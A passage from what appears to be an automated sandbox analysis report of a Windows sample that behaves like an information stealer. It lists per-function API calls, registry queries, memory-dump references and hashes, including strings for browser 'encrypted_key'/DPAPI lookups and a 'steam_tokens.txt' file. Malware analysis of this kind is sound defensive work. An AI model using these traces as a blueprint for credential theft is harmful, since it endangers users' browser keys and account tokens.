                          • RegOpenKeyExA.ADVAPI32(80000002,0119B738,00000000,00020119,00529500), ref: 005328D1
                          • RegQueryValueExA.ADVAPI32(00529500,011ADA80,00000000,00000000,00000000,000000FF), ref: 005328EC
                          • RegCloseKey.ADVAPI32(00529500), ref: 005328F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 5c4fe3df0326cef23d0ad0d114f118d920834a12c269305111624fdb1d3335c7
                          • Instruction ID: f6d955441e7290185a5e7bda0d7adaa9241de350c1809863c8ab30e203a5701f
                          • Opcode Fuzzy Hash: 5c4fe3df0326cef23d0ad0d114f118d920834a12c269305111624fdb1d3335c7
                          • Instruction Fuzzy Hash: CB01F279600209BFD710DBA4EC4DFAF7B6CEB45311F008156FE08D2250EB74594487A1
                          Function 005171F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(?), ref: 0051723E
                          • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00517279
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00517280
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 005172C3
                          • HeapFree.KERNEL32(00000000), ref: 005172CA
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00517329
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                          • String ID:
                          • API String ID: 174687898-0
                          • Opcode ID: d956839d3e0b7abc3751d598380a819947d1e0ae048226d7e77bf419702e5a20
                          • Instruction ID: cbd897c0456aeda9159fae66d6b500a66af4a82bb77dbdd7a1435ce17b0986b5
                          • Opcode Fuzzy Hash: d956839d3e0b7abc3751d598380a819947d1e0ae048226d7e77bf419702e5a20
                          • Instruction Fuzzy Hash: 58418D7570420A9BEB20CF6DDC84BAAB7F8FB89301F1449A9EC59C7310E735E980DA50
                          Function 0052D7B0 Relevance: 9.1, APIs: 6, Instructions: 127registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0052D7D6
                          • RegOpenKeyExA.ADVAPI32(80000001,011AD408,00000000,00020119,?), ref: 0052D7F5
                          • RegQueryValueExA.ADVAPI32(?,011ADE88,00000000,00000000,00000000,000000FF), ref: 0052D819
                          • RegCloseKey.ADVAPI32(?), ref: 0052D823
                          • lstrcat.KERNEL32(?,00000000), ref: 0052D848
                          • lstrcat.KERNEL32(?,011ADD68), ref: 0052D85C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValuememset
                          • String ID:
                          • API String ID: 2623679115-0
                          • Opcode ID: a2cbdf47fbc0e279f0359acc9156e94ead2e9f530a131a0cc073dd664d0354ea
                          • Instruction ID: 1d184980623f71e177e832d644456fdf0a840ab531ad8dea7edf2e076171806b
                          • Opcode Fuzzy Hash: a2cbdf47fbc0e279f0359acc9156e94ead2e9f530a131a0cc073dd664d0354ea
                          • Instruction Fuzzy Hash: FB41B075A1010D9BDB54EF24FC86FDE7BB9BF84300F0080A5BA0997251EF74AA858F91
                          Function 00519C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 00519CA8
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00519CDA
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00519D03
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocLocallstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2746078483-738592651
                          • Opcode ID: 70063732fb1cdacb3daa68279a37e3bdf9a45493d651cff5c272783a0ceebf5f
                          • Instruction ID: dc06503c57ec1abd1261fadfcb0dab1922ac428aecb0019da2b13b6fe2dcf359
                          • Opcode Fuzzy Hash: 70063732fb1cdacb3daa68279a37e3bdf9a45493d651cff5c272783a0ceebf5f
                          • Instruction Fuzzy Hash: 0741C531A0020A9BEB21EF64EC956EEBFB5BF94704F044468E955A7252DB70ED84CBD0
                          Function 0052E9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                          Download Yara Rule
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0052EA24
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052EA53
                          • lstrcat.KERNEL32(?,00000000), ref: 0052EA61
                          • lstrcat.KERNEL32(?,00541794), ref: 0052EA7A
                          • lstrcat.KERNEL32(?,011A8B20), ref: 0052EA8D
                          • lstrcat.KERNEL32(?,00541794), ref: 0052EA9F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: dc1a575152f9b71a0ea6442e27acd51512d1e149613828b4251f63e800284aa1
                          • Instruction ID: 9c5b42025f1b110b2d6e71c27b2f1d40f49cbad012fd57ad972e8afd9a36036c
                          • Opcode Fuzzy Hash: dc1a575152f9b71a0ea6442e27acd51512d1e149613828b4251f63e800284aa1
                          • Instruction Fuzzy Hash: 39411675A50119ABDB10EB64EC46EEE3B79FF89300F0044A9BA1697280DF749EC48F94
                          Function 0052ECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052ECDF
                          • lstrlen.KERNEL32(00000000), ref: 0052ECF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052ED1D
                          • lstrlen.KERNEL32(00000000), ref: 0052ED24
                          • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0052ED52
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: steam_tokens.txt
                          • API String ID: 367037083-401951677
                          • Opcode ID: 506ec5f1b93907ea922c1f78a82ef7f3af1306b1cc266cd745b47343cadd4efa
                          • Instruction ID: bb592cc172e4c1a87faa3925257ea4338e712b33c6635efbf3327673567f25bf
                          • Opcode Fuzzy Hash: 506ec5f1b93907ea922c1f78a82ef7f3af1306b1cc266cd745b47343cadd4efa
                          • Instruction Fuzzy Hash: 5731C131A505165BE722BB78FC4EA9E7FA9BF82300F045020F806DB252EB74DC958BC1
                          Function 00519A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0051140E), ref: 00519A9A
                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0051140E), ref: 00519AB0
                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,0051140E), ref: 00519AC7
                          • ReadFile.KERNEL32(00000000,00000000,?,0051140E,00000000,?,?,?,0051140E), ref: 00519AE0
                          • LocalFree.KERNEL32(?,?,?,?,0051140E), ref: 00519B00
                          • CloseHandle.KERNEL32(00000000,?,?,?,0051140E), ref: 00519B07
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 63759577dcd31cebd03d88d93b12eb4dd15bf6767418a382cbc1a3b0e17f40e5
                          • Instruction ID: 933b3ba0cbd767746aafc74883c0ac3dc26d8a56f2d0221a348f63a79fcfaedb
                          • Opcode Fuzzy Hash: 63759577dcd31cebd03d88d93b12eb4dd15bf6767418a382cbc1a3b0e17f40e5
                          • Instruction Fuzzy Hash: 1611797060420AAFEB10DFA8DC98EAF7B7CFB05700F14421AF90196280EB749D80CBA5
                          Function 00535AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00535B14
                            • Part of subcall function 0053A173: std::exception::exception.LIBCMT ref: 0053A188
                            • Part of subcall function 0053A173: std::exception::exception.LIBCMT ref: 0053A1AE
                          • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00535B7C
                          • memmove.MSVCRT(00000000,?,?), ref: 00535B89
                          • memmove.MSVCRT(00000000,?,?), ref: 00535B98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long
                          • API String ID: 2052693487-3788999226
                          • Opcode ID: 63eac08ad3e9c10c4a008de30b4b2166858cec69f8171782c3b8b6143a7eff30
                          • Instruction ID: 66eb1f7430b0538060769c84e2aca1cff4b6ddff6515b864569f738ddb2e1037
                          • Opcode Fuzzy Hash: 63eac08ad3e9c10c4a008de30b4b2166858cec69f8171782c3b8b6143a7eff30
                          • Instruction Fuzzy Hash: 92417F71B005199FCF08DF6CC995AAEBBB5FB88310F158629E909E7384E634DD00CB90
                          Function 005390DD Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Typememset
                          • String ID:
                          • API String ID: 3530896902-3916222277
                          • Opcode ID: 57e7b5b43bfd28b498c77806e87ffe5073650cc6989949eb9a94d38f3aed0f54
                          • Instruction ID: 449d3a429eb7a98a5ef0fc32098db88337c16233f1c5cec819439675c054f303
                          • Opcode Fuzzy Hash: 57e7b5b43bfd28b498c77806e87ffe5073650cc6989949eb9a94d38f3aed0f54
                          • Instruction Fuzzy Hash: FE4118F450475C9EDB318B248C89FFBBFFDAB45304F1448E8E98696182E2B19A44DF60
                          Function 00527D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00527D58
                            • Part of subcall function 0053A1C0: std::exception::exception.LIBCMT ref: 0053A1D5
                            • Part of subcall function 0053A1C0: std::exception::exception.LIBCMT ref: 0053A1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 00527D76
                          • std::_Xinvalid_argument.LIBCPMT ref: 00527D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$std::exception::exception
                          • String ID: invalid string position$string too long
                          • API String ID: 3310641104-4289949731
                          • Opcode ID: b99284a9cad083b815593d0a63385b2ec575e22fbc9a60fe07eeea821085b4af
                          • Instruction ID: 7168c5debc65e95da57d6c4ed35614bec9d144b672f7393a31695dadd5799aed
                          • Opcode Fuzzy Hash: b99284a9cad083b815593d0a63385b2ec575e22fbc9a60fe07eeea821085b4af
                          • Instruction Fuzzy Hash: 0E21B9323046144BD721DE6CE881A3ABBE5FF96710F204A6EE491CB2C1D771DC40C7A5
                          Function 005333C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005333EF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 005333F6
                          • GlobalMemoryStatusEx.KERNEL32 ref: 00533411
                          • wsprintfA.USER32 ref: 00533437
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
